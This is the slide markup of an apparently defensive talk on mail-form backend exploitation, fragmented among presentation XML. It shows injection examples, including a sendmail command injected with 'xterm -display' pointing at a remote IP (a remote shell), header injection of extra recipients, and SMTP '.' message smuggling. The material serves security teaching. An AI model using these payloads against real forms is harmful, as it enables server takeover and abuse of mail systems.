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436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39440" y="4589640"/>
            <a:ext cx="860436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8360" y="210168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39440" y="458964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48360" y="458964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277020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48600" y="2101680"/>
            <a:ext cx="277020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57760" y="2101680"/>
            <a:ext cx="277020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39440" y="4589640"/>
            <a:ext cx="277020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48600" y="4589640"/>
            <a:ext cx="277020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57760" y="4589640"/>
            <a:ext cx="277020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436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436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419868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48360" y="2101680"/>
            <a:ext cx="419868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39440" y="627120"/>
            <a:ext cx="860436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48360" y="2101680"/>
            <a:ext cx="419868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39440" y="458964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419868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8360" y="210168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48360" y="458964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8360" y="210168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39440" y="4589640"/>
            <a:ext cx="860436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55e00"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="00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440" y="2101680"/>
            <a:ext cx="860436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405720" indent="-304200">
              <a:lnSpc>
                <a:spcPct val="11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11800" indent="-270000">
              <a:lnSpc>
                <a:spcPct val="116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17520" indent="-202680">
              <a:lnSpc>
                <a:spcPct val="11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23600" indent="-203040">
              <a:lnSpc>
                <a:spcPct val="116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29320" indent="-202680">
              <a:lnSpc>
                <a:spcPct val="11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29320" indent="-202680">
              <a:lnSpc>
                <a:spcPct val="11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29320" indent="-202680">
              <a:lnSpc>
                <a:spcPct val="11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55e00"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="00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39440" y="414360"/>
            <a:ext cx="8605800" cy="16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Avoiding Backend</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:b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Exploitation of Mail Fo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Max Kessler, LPIC-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55e00"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="00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OWASP Top 10 Li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24000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1426"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00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#1 Unvalidated user in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24000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1426"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00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#2 Broken access control (sort of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24000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1426"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00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#6 Injection fla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55e00"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="00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How do mail forms work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24000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1426"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00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A user types in their name, address and a mess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24000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1426"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00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Their data are sent to the web server in an HTTP reque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24000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1426"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00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The server runs a script that formats the text for consumption by a mail server, then feeds it to the mail serv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55e00"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="00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User input on the command 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12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Exploit 1: insert semicolon/ampers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12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The command should b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0">
              <a:lnSpc>
                <a:spcPct val="124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/bin/sh /usr/sbin/sendmail -f max@example.com \ user1@exampl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12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The command i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0">
              <a:lnSpc>
                <a:spcPct val="124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/bin/sh /usr/sbin/sendmail -f max@example.com&amp; \ xterm -display 192.168.0.201:0&amp;echo \ user1@exampl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55e00"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="00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Replay with control charac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12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Exploit 2: insert control charac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12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E-mail address should b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0">
              <a:lnSpc>
                <a:spcPct val="124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max@example.c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12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E-mail address i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0">
              <a:lnSpc>
                <a:spcPct val="124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max@example.c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0">
              <a:lnSpc>
                <a:spcPct val="124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o: user2@example.com, user3@example.c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55e00"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="00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Starting a new mess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12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Exploit 3: using '.' to start a new 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12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MTP servers allow multiple messages to be sent through a single connection.  A new message is started by putting a '.' on a line by itself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